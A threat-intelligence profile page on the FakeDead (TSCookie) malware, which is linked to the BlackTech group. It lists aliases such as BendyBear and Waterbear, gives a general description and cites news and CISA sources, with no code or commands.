Fakedead

Malware updated 7 months ago (2024-05-04T18:12:40.003Z)

Download STIX

Preview STIX

FakeDead, also known as TSCookie, is a potent malware that has been linked to a series of backdoors including BendyBear, BIFROSE (or Bifrost), Consock, KIVARS, PLEAD, XBOW, and Waterbear (also known as DBGPRINT). This malicious software infiltrates systems typically through suspicious downloads, emails, or websites, often unbeknownst to the user. Once embedded, it can steal personal information, disrupt operations, or even hold data hostage for ransom. The group responsible for deploying FakeDead employs a variety of custom malware families such as BendyBear, Bifrose, BTSDoor, FlagPro, FrontShell (FakeDead’s downloader module), IconDown, PLEAD, SpiderPig, SpiderSpring, SpiderStack, and WaterBear. The malware has evolved over time, with its operators developing sophisticated techniques like "living off the land," which involves the exploitation of native Windows utilities for malicious purposes. FrontShell serves as the downloader module for FakeDead, facilitating its infiltration into target systems. The attribution of this malware to multiple backdoors indicates a complex and layered threat landscape. Organizations must therefore ensure robust cybersecurity measures are in place to detect and neutralize threats from FakeDead and similar malware.

Description last updated: 2023-10-11T02:52:46.044Z

What's your take? (Question 1 of 3)

Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.

Possible Aliases / Cluster overlaps

It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at. Create a free account to see the source evidence for each alias, and help fix any errors.

Alias Description	Votes
BendyBear is a possible alias for Fakedead. BendyBear is a sophisticated x64 shellcode malware that requires loader or code injection for deployment. It contains advanced features not typically found in shellcode, making it a potent threat to computer systems. BendyBear, along with other specific malware strains such as Bifrose, SpiderPig, an	3
TSCookie is a possible alias for Fakedead. TSCookie is a malware that has been associated with various backdoors such as BendyBear, BIFROSE (Bifrost), Consock, KIVARS, PLEAD, XBOW, and Waterbear (DBGPRINT). It's also known as FakeDead and is used in conjunction with other tools like BendyBear and Flagpro by BlackTech, an advanced persistent	2
Waterbear is a possible alias for Fakedead. WaterBear is a sophisticated form of malware, known for its ability to exploit and damage computer systems. It infiltrates systems through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it can steal personal information, disrupt operations, or hold data hostag	2

Miscellaneous Associations

Other elements of context that could aid in the identification of relevance

Downloader

Analyst Notes & Discussion

Be the first to leave your mark here! Log in to share your views and vote.

Source Document References

Information about the Fakedead Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more

Source Link	CreatedAt	Title
CERT-EU	a year ago	China's BlackTech Hacking Group Exploited Routers to Target U.S. and Japanese Companies
Securityaffairs	a year ago	China-linked APT BlackTech was spotted hiding in Cisco router firmware
BankInfoSecurity	a year ago	Chinese Hackers Target Routers in IP Theft Campaign
CISA	a year ago	People's Republic of China-Linked Cyber Actors Hide in Router Firmware \| CISA